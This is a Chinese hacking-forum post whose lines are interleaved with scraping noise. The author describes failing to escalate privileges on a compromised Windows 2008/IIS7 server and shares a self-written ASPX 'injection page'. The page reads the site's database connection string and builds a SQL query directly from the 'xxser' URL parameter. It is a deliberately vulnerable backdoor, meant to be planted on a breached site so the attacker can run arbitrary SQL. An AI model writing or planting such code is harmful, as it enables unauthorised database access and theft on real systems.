昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。! ~3 C6 W4 I/ Y/ X/ ~3 v
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
. o& e( @4 F3 a代码量不多,自己写个拉倒了。烦死了。
6 O8 A1 n! j4 ]: y8 P+ `
' A; j7 c! m O1 r8 J/ Y
0 e5 ]; X) l. n3 o# h! M<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4 `5 f4 p" `7 u! X N! i<html xmlns="http://www.w3.org/1999/xhtml">
' L0 ^. t/ D0 u0 B2 a<head runat="server">
( |( Y2 X+ ^$ n7 \ <title>暗影aspx构造注射专用页面</title>
# @, u, Q) u/ g+ Z+ r</head>- D" `. j) y( k/ c
<body>) s; }+ z% o$ m, e1 a# m
<form id="form1" runat="server"> P) v* k7 C8 e. M8 S$ ]
<div>
* x( ~) x# G5 h. f) ` <script language="c#" runat="server">. J2 G9 P2 s% L% w/ E" b5 t" P, p
: i7 [$ M; B% i1 ~. a6 t! w void page_init(object sender, EventArgs e)$ l1 l) C7 f6 K
{: A* S; n, H! t! v6 }
2 C# D: v$ s- P3 [2 X- h System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();6 g- V; j* y, [( V3 ~0 G5 a
; `! A* z5 `- `8 W+ ?* }) m conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
3 J |2 P9 z8 G3 f* o/ ~ conn.Open();* c3 _. t! U; q6 p ~* J# k5 x' E. j4 J
2 Q4 m; q& P7 F" k
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
% X. e) ~. S3 t; e % H& w2 Y% H" M; E3 b( w- X' I6 }
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);7 z0 s+ U0 K7 ?: F h( N
int x = command.ExecuteNonQuery();* H& M& I/ {, ?, y7 T$ K! t
Response.Write(i+"\n"); q* m- M% B, R% ]7 I2 N4 S
Response.Write(x);& n/ Q0 y2 N8 m0 _' j
conn.Close();
9 u7 X, R& K9 P( L/ Z: ]1 Y }
- N4 V8 N; v* k$ X: Z+ w( L- ^ , G4 ^5 W, |8 P
</script>
. M* f* K3 V' f' o8 b </div>
3 E! I$ z: f% V; y- m5 {, h' |! |# y </form>6 S) u3 J% [& P ^ \7 F+ r
</body>
+ {9 C( E( [# v, A. I6 }</html>; d4 i( i. Z7 M' j. u5 e& Z9 K
|